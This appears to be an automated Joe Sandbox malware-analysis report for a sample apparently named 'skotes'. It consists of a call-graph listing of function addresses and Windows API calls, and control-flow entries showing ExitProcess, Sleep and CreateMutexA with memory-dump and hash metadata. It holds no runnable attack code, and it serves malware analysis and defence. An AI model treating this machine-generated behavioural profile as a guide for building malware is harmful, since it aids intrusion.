9979->9976 9984 abccd5 9979->9984 9982 abc3d0 9982->9974 9985 abc3b7 9984->9985 9986 abcce3 InitializeCriticalSectionEx 9984->9986 9985->9974 9986->9985 9989 abcd1f RtlInitializeConditionVariable 9988->9989 9989->9982 10304 aa3fe0 10305 aa4022 10304->10305 10306 aa408c 10305->10306 10307 aa40d2 10305->10307 10310 aa4035 std::future_error::future_error 10305->10310 10311 aa35e0 10306->10311 10317 aa3ee0 10307->10317 10312 aa3616 10311->10312 10316 aa364e Concurrency::cancel_current_task shared_ptr std::future_error::future_error 10312->10316 10323 aa2ce0 10312->10323 10314 aa369e 10314->10316 10332 aa2c00 10314->10332 10316->10310 10318 aa3f48 10317->10318 10319 aa3f1e 10317->10319 10320 aa3f58 10318->10320 10321 aa2c00 3 API calls 10318->10321 10319->10310 10320->10310 10322 aa3f7f 10321->10322 10322->10310 10324 aa2d1d 10323->10324 10325 abbedf InitOnceExecuteOnce 10324->10325 10326 aa2d46 10325->10326 10327 aa2d51 std::future_error::future_error 10326->10327 10328 aa2d88 10326->10328 10339 abbef7 10326->10339 10327->10314 10330 aa2440 3 API calls 10328->10330 10331 aa2d9b 10330->10331 10331->10314 10333 aa2c0e 10332->10333 10352 abb847 10333->10352 10335 aa2c42 10336 aa2c49 10335->10336 10358 aa2c80 10335->10358 10336->10316 10338 aa2c58 Concurrency::cancel_current_task 10340 abbf03 Concurrency::cancel_current_task 10339->10340 10341 abbf6a 10340->10341 10342 abbf73 10340->10342 10346 abbe7f 10341->10346 10344 aa2ae0 4 API calls 10342->10344 10345 abbf6f 10344->10345 10345->10328 10347 abcc31 InitOnceExecuteOnce 10346->10347 10348 abbe97 10347->10348 10349 abbe9e 10348->10349 10350 ad6cbb 3 API calls 10348->10350 10349->10345 10351 abbea7 10350->10351 10351->10345 10353 abb873 Concurrency::details::_Reschedule_chore 10352->10353 10354 abb854 10352->10354 10353->10335 10361 abcb77 10354->10361 10356 abb864 10356->10353 10363 abb81e 10356->10363 10359 abb7fb TpReleaseWork 10358->10359 10360 aa2cb2 shared_ptr 10359->10360 10360->10338 10362 abcb92 CreateThreadpoolWork 10361->10362 10362->10356 10364 abb827 Concurrency::details::_Reschedule_chore 10363->10364 10367 abcdcc 10364->10367 10366 abb841 10366->10353 10368 abcde1 TpPostWork 10367->10368 10368->10366 10379 aa4120 10380 aa416a 10379->10380 10381 aa3ee0 3 API calls 10380->10381 10382 aa41b2 std::future_error::future_error 10380->10382 10381->10382 10277 aa9ba5 10278 aa9ba7 10277->10278 10279 aa5c10 3 API calls 10278->10279 10280 aa9cb1 10279->10280 10281 aa8b30 3 API calls 10280->10281 10282 aa9cc2 10281->10282 9990 aa9ab8 9992 aa9acc 9990->9992 9993 aa9b08 9992->9993 9994 aa5c10 3 API calls 9993->9994 9995 aa9b7c 9994->9995 10002 aa8b30 9995->10002 9997 aa9b8d 9998 aa5c10 3 API calls 9997->9998 9999 aa9cb1 9998->9999 10000 aa8b30 3 API calls 9999->10000 10001 aa9cc2 10000->10001 10003 aa8b7c 10002->10003 10004 aa5c10 3 API calls 10003->10004 10005 aa8b97 shared_ptr 10004->10005 10006 aa8d01 shared_ptr std::future_error::future_error 10005->10006 10007 aa5c10 3 API calls 10005->10007 10006->9997 10009 aa8d9a shared_ptr 10007->10009 10008 aa8e7e shared_ptr std::future_error::future_error 10008->9997 10009->10008 10010 aa5c10 3 API calls 10009->10010 10011 aa8f1a shared_ptr std::future_error::future_error 10010->10011 10011->9997 10234 aacc79 10235 aacc84 shared_ptr 10234->10235 10236 aaccda shared_ptr std::future_error::future_error 10235->10236 10237 aa5c10 3 API calls 10235->10237 10238 aace9d 10237->10238 10240 aaca70 10238->10240 10242 aacadd 10240->10242 10241 aaccda shared_ptr std::future_error::future_error 10243 aa5c10 3 API calls 10242->10243 10248 aacc87 10242->10248 10244 aaccf9 10243->10244 10250 aa9030 10244->10250 10246 aa5c10 3 API calls 10247 aace9d 10246->10247 10249 aaca70 3 API calls 10247->10249 10248->10241 10248->10246 10251 aa9080 10250->10251 10252 aa5c10 3 API calls 10251->10252 10253 aa909a shared_ptr std::future_error::future_error 10252->10253 10253->10248 10283 ad8bbe 10284 ad8868 3 API calls 10283->10284 10285 ad8bdc 10284->10285 10012 aa42b0 10015 aa3ac0 10012->10015 10014 aa42bb shared_ptr 10016 aa3af9 10015->10016 10019 aa3c38 10016->10019 10020 aa3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10016->10020 10025 aa32d0 10016->10025 10017 aa32d0 5 API calls 10022 aa3c5f 10017->10022 10019->10017 10019->10022 10020->10014 10021 aa3c68 10021->10014 10022->10021 10042 aa3810 10022->10042 10046 abc6ac 10025->10046 10028 aa333c __Mtx_unlock 10030 abc26a 4 API calls 10028->10030 10032 aa3350 std::future_error::future_error 10028->10032 10029 aa3314 10029->10028 10049 abc26a 10029->10049 10031 aa3377 10030->10031 10033 abc6ac GetSystemTimePreciseAsFileTime 10031->10033 10032->10019 10034 aa33af 10033->10034 10035 abc26a 4 API calls 10034->10035 10036 aa33b6 10034->10036 10035->10036 10037 abc26a 4 API calls 10036->10037 10038 aa33d7 __Mtx_unlock 10036->10038 10037->10038 10039 abc26a 4 API calls 10038->10039 10040 aa33eb 10038->10040 10041 aa340e 10039->10041 10040->10019 10041->10019 10043 aa381c 10042->10043 10087 aa2440 10043->10087 10053 abc452 10046->10053 10048 abc6b9 10048->10029 10050 abc292 10049->10050 10051 abc274 10049->10051 10050->10050 10051->10050 10070 abc297 10051->10070 10054 abc4a8 10053->10054 10056 abc47a std::future_error::future_error 10053->10056 10054->10056 10059 abcf6b 10054->10059 10056->10048 10057 abc4fd __Xtime_diff_to_millis2 10057->10056 10058 abcf6b _xtime_get GetSystemTimePreciseAsFileTime 10057->10058 10058->10057 10060 abcf7a 10059->10060 10061 abcf87 __aulldvrm 10059->10061 10060->10061 10063 abcf44 10060->10063 10061->10057 10066 abcbea 10063->10066 10067 abcbfb GetSystemTimePreciseAsFileTime 10066->10067 10068 abcc07 10066->10068 10067->10068 10068->10061 10073 aa2ae0 10070->10073 10072 abc2ae Concurrency::cancel_current_task 10080 abbedf 10073->10080 10075 aa2af4 __cftof 10075->10072 10076 ada671 __cftof 3 API calls 10075->10076 10079 ad6ccc 10076->10079 10077 ad8bec __cftof 3 API calls 10078 ad6cf6 10077->10078 10079->10077 10083 abcc31 10080->10083 10084 abcc3f InitOnceExecuteOnce 10083->10084 10086 abbef2 10083->10086 10084->10086 10086->10075 10090 abb5d6 10087->10090 10089 aa2472 10092 abb5f1 Concurrency::cancel_current_task 10090->10092 10091 ad8bec __cftof 3 API calls 10093 abb69f 10091->10093 10092->10091 10094 abb658 __cftof std::future_error::future_error 10092->10094 10094->10089 10369 aa55f0 10370 aa5610 10369->10370 10371 aa22c0 3 API calls 10370->10371 10372 aa5710 std::future_error::future_error 10370->10372 10371->10370 10373 aa43f0 10374 abbedf InitOnceExecuteOnce 10373->10374 10375 aa440a 10374->10375 10376 aa4411 10375->10376 10377 ad6cbb 3 API calls 10375->10377 10378 aa4424 10377->10378 10415 aa3970 10416 abc68b __Mtx_init_in_situ 2 API calls 10415->10416 10417 aa39a7 10416->10417 10418 abc68b __Mtx_init_in_situ 2 API calls 10417->10418 10419 aa39e6 10418->10419 10420 aa2170 10423 abc6fc 10420->10423 10422 aa217a 10424 abc70c 10423->10424 10425 abc724 10423->10425 10424->10425 10427 abcfbe 10424->10427 10425->10422 10428 abccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10427->10428 10429 abcfd0 10428->10429 10429->10424 10254 aa4276 10255 aa2410 4 API calls 10254->10255 10256 aa427f 10255->10256 10430 aa5f76 10432 aa5f81 shared_ptr 10430->10432 10431 aa5ffe shared_ptr std::future_error::future_error 10432->10431 10433 aa5c10 3 API calls 10432->10433 10434 aa66ac 10433->10434 10435 aa5c10 3 API calls 10434->10435 10436 aa66b1 10435->10436 10437 aa22c0 3 API calls 10436->10437 10438 aa66c9 shared_ptr 10437->10438 10439 aa5c10 3 API calls 10438->10439 10440 aa673d 10439->10440 10441 aa22c0 3 API calls 10440->10441 10443 aa6757 shared_ptr 10441->10443 10442 aa5c10 3 API calls 10442->10443 10443->10442 10444 aa22c0 3 API calls 10443->10444 10445 aa6852 shared_ptr std::future_error::future_error 10443->10445 10444->10443 10095 aa3c8e 10096 aa3c98 10095->10096 10098 aa3ca5 10096->10098 10103 aa2410 10096->10103 10099 aa3810 3 API calls 10098->10099 10100 aa3ccf 10099->10100 10101 aa3810 3 API calls 10100->10101 10102 aa3cdb shared_ptr 10101->10102 10104 aa2424 10103->10104 10107 abb52d 10104->10107 10115 ad3aed 10107->10115 10110 abb5a5 ___std_exception_copy 10122 abb1ad 10110->10122 10111 abb598 10118 abaf56 10111->10118 10114 aa242a 10114->10098 10126 ad4f29 10115->10126 10117 abb555 10117->10110 10117->10111 10117->10114 10119 abaf9f ___std_exception_copy 10118->10119 10121 abafb2 shared_ptr 10119->10121 10132 abb39f 10119->10132 10121->10114 10123 abb1d8 10122->10123 10124 abb1e1 shared_ptr 10122->10124 10125 abb39f 4 API calls 10123->10125 10124->10114 10125->10124 10127 ad4f2e __cftof 10126->10127 10127->10117 10128 add634 __cftof 3 API calls 10127->10128 10131 ad8bfc ___std_exception_copy 10127->10131 10128->10131 10129 ad65ed __cftof 3 API calls 10130 ad8c2f 10129->10130 10131->10129 10133 abbedf InitOnceExecuteOnce 10132->10133 10134 abb3e1 10133->10134 10135 abb3e8 10134->10135 10143 ad6cbb 10134->10143 10135->10121 10144 ad6cc7 __cftof 10143->10144 10145 ada671 __cftof 3 API calls 10144->10145 10148 ad6ccc 10145->10148 10146 ad8bec __cftof 3 API calls 10147 ad6cf6 10146->10147 10148->10146 10257 ad6a44 10258 ad6a5c 10257->10258 10259 ad6a52 10257->10259 10262 ad698d 10258->10262 10261 ad6a76 __freea 10263 ad690a __cftof 3 API calls 10262->10263 10264 ad699f 10263->10264 10264->10261 10158 aa20c0 10159 abc68b __Mtx_init_in_situ 2 API calls 10158->10159 10160 aa20cc 10159->10160 10161 aae0c0 recv 10162 aae122 recv 10161->10162 10163 aae157 recv 10162->10163 10165 aae191 10163->10165 10164 aae2b3 std::future_error::future_error 10165->10164 10166 abc6ac GetSystemTimePreciseAsFileTime 10165->10166 10167 aae2ee 10166->10167 10168 abc26a 4 API calls 10167->10168 10169 aae358 10168->10169 10170 aa2ec0 10171 aa2f06 10170->10171 10174 aa2f6f 10170->10174 10172 abc6ac GetSystemTimePreciseAsFileTime 10171->10172 10173 aa2f12 10172->10173 10175 aa301e 10173->10175 10178 aa2f1d __Mtx_unlock 10173->10178 10180 abc6ac GetSystemTimePreciseAsFileTime 10174->10180 10189 aa2fef 10174->10189 10176 abc26a 4 API calls 10175->10176 10177 aa3024 10176->10177 10179 abc26a 4 API calls 10177->10179 10178->10174 10178->10177 10181 aa2fb9 10179->10181 10180->10181 10182 abc26a 4 API calls 10181->10182 10183 aa2fc0 __Mtx_unlock 10181->10183 10182->10183 10184 abc26a 4 API calls 10183->10184 10185 aa2fd8 10183->10185 10184->10185 10186 abc26a 4 API calls 10185->10186 10185->10189 10187 aa303c 10186->10187 10188 abc6ac GetSystemTimePreciseAsFileTime 10187->10188 10198 aa3080 shared_ptr __Mtx_unlock 10188->10198 10190 abc26a 4 API calls 10191 aa31cb 10190->10191 10192 abc26a 4 API calls 10191->10192 10193 aa31d1 10192->10193 10194 abc26a 4 API calls 10193->10194 10200 aa3193 __Mtx_unlock 10194->10200 10195 aa31a7 std::future_error::future_error 10196 abc26a 4 API calls 10197 aa31dd 10196->10197 10198->10191 10198->10195 10199 abc6ac GetSystemTimePreciseAsFileTime 10198->10199 10201 aa315f 10198->10201 10199->10201 10200->10195 10200->10196 10201->10190 10201->10193 10201->10200 10220 aa2e00 10221 aa2e28 10220->10221 10222 abc68b __Mtx_init_in_situ 2 API calls 10221->10222 10223 aa2e33 10222->10223 10286 aa8980 10288 aa8aea 10286->10288 10289 aa89d8 shared_ptr 10286->10289 10287 aa5c10 3 API calls 10287->10289 10289->10287 10289->10288 10202 abd0c7 10204 abd0d7 10202->10204 10203 abd17f 10204->10203 10205 abd17b RtlWakeAllConditionVariable 10204->10205 10265 aa3c47 10266 aa3c51 10265->10266 10268 aa32d0 5 API calls 10266->10268 10269 aa3c5f 10266->10269 10267 aa3c68 10268->10269 10269->10267 10270 aa3810 3 API calls 10269->10270 10271 aa3cdb shared_ptr 10270->10271 10456 aa9f44 10457 aa9f4c shared_ptr 10456->10457 10458 aaa953 Sleep CreateMutexA 10457->10458 10460 aaa01f shared_ptr 10457->10460 10459 aaa98e 10458->10459 10461 aa215a 10462 abc6fc InitializeCriticalSectionEx 10461->10462 10463 aa2164 10462->10463 10290 aa3f9f 10291 aa3fad 10290->10291 10293 aa3fb6 10290->10293 10292 aa2410 4 API calls 10291->10292 10292->10293 10206 aa9adc 10207 aa9aea 10206->10207 10211 aa9afe shared_ptr 10206->10211 10208 aaa917 10207->10208 10207->10211 10209 aaa953 Sleep CreateMutexA 10208->10209 10210 aaa98e 10209->10210 10212 aa5c10 3 API calls 10211->10212 10213 aa9b7c 10212->10213 10214 aa8b30 3 API calls 10213->10214 10215 aa9b8d 10214->10215 10216 aa5c10 3 API calls 10215->10216 10217 aa9cb1 10216->10217 10218 aa8b30 3 API calls 10217->10218 10219 aa9cc2 10218->10219 10294 aa2b90 10295 aa2bce 10294->10295 10298 abb7fb 10295->10298 10297 aa2bdb shared_ptr std::future_error::future_error 10299 abb817 10298->10299 10300 abb807 10298->10300 10299->10297 10300->10299 10302 abca78 10300->10302 10303 abca8d TpReleaseWork 10302->10303 10303->10299 10402 abd111 10403 abd122 10402->10403 10405 abd12a 10403->10405 10406 abd199 10403->10406 10407 abd1a7 SleepConditionVariableCS 10406->10407 10409 abd1c0 10406->10409 10407->10409 10409->10403 10410 aa2b10 10411 aa2b1a 10410->10411 10412 aa2b1c 10410->10412 10413 abc26a 4 API calls 10412->10413 10414 aa2b22 10413->10414 9682 aaa856 9683 aaa870 9682->9683 9686 aaa892 shared_ptr 9682->9686 9684 aaa953 Sleep CreateMutexA 9683->9684 9683->9686 9685 aaa98e 9684->9685

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 342 ad652b-ad6538 call ada302 345 ad655a-ad656c call ad656d ExitProcess 342->345 346 ad653a-ad6548 GetPEB 342->346 346->345 347 ad654a-ad6559 346->347 347->345
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00AD652A,?,?,?,?,?,00AD7661), ref: 00AD6567
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                • Opcode ID: c9f96b2dd9af7837c084d48c7bb056961a6a719c200ce7744a01ce91a2aa017c
                                                                                                                                                                                                                                                                • Instruction ID: 4480ef2faea7ce8dc3dd9270b0e85b0df928bb84df19b03379267a7d9ac545f9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9f96b2dd9af7837c084d48c7bb056961a6a719c200ce7744a01ce91a2aa017c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60E08C31140188AECF257F18D90DE8D3B6AEB51782F409801F81A5A366CB76DEC1C680

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 503c106e15c381b0eda63dd9ef1a72e58f4df2821e46c455680a718430720fcc
                                                                                                                                                                                                                                                                • Instruction ID: f72f8067b305c38a96671adf4d73f96a6b056c66973619b2aee96143f600b388
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 503c106e15c381b0eda63dd9ef1a72e58f4df2821e46c455680a718430720fcc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF3116717046009BEB08AB78ED9D7AFF7A6AB97320F248218E018973D6D7758981C761

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
